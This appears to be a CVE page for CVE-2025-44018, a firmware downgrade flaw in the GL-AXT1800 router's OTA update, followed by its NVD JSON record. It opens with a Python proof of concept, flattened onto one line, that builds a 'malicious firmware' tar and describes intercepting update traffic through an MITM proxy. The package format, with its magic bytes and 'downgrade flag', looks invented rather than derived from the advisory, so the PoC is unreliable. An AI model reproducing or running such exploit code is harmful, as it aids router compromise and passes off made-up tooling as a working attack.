CVE-2025-44018

#!/usr/bin/env python3 # CVE-2025-44018 PoC - GL-AXT1800 Firmware Downgrade Attack # This PoC demonstrates the firmware downgrade vulnerability via MITM attack import struct import hashlib import os def create_malicious_tarball(): """ Create a malicious .tar file for firmware downgrade Note: This is for educational/testing purposes only """ # Malicious firmware metadata firmware_version = b'4.6.0' # Older vulnerable version device_model = b'GL-AXT1800' # Create malicious firmware package header header = bytearray() header.extend(b'GLINF') # Magic bytes header.extend(firmware_version.ljust(16, b'\x00')) header.extend(device_model.ljust(32, b'\x00')) # Version downgrade flag (vulnerability trigger) downgrade_flag = struct.pack('<I', 0x00000001) header.extend(downgrade_flag) # Calculate checksum checksum = hashlib.sha256(header).digest() header.extend(checksum) # Create the malicious .tar structure malicious_tar = bytearray() malicious_tar.extend(header) malicious_tar.extend(b'\x00' * 512) # Padding return bytes(malicious_tar) def mitm_proxy_config(): """ Configuration for MITM proxy to intercept OTA updates """ config = { 'listen_port': 8080, 'target_host': 'upgrade.gl-inet.com', 'target_port': 443, 'malicious_firmware': 'malicious_firmware.tar', 'replace_pattern': b'/api/v2/firmware/check', # OTA check endpoint } return config def main(): print("[*] CVE-2025-44018 GL-AXT1800 Firmware Downgrade PoC") print("[*] Creating malicious firmware package...") malicious_tar = create_malicious_tarball() with open('malicious_firmware.tar', 'wb') as f: f.write(malicious_tar) print("[+] Malicious firmware created: malicious_firmware.tar") print("[*] Configure MITM proxy using mitmproxy or similar tool") print("[*] Intercept OTA update requests and replace with malicious_firmware.tar") print("[!] Warning: This PoC is for authorized testing only") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-44018", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:49.273", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A firmware downgrade vulnerability exists in the OTA Update functionality of GL-Inet GL-AXT1800 4.7.0. A specially crafted .tar file can lead to a firmware downgrade. An attacker can perform a man-in-the-middle attack to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2230", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2230", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}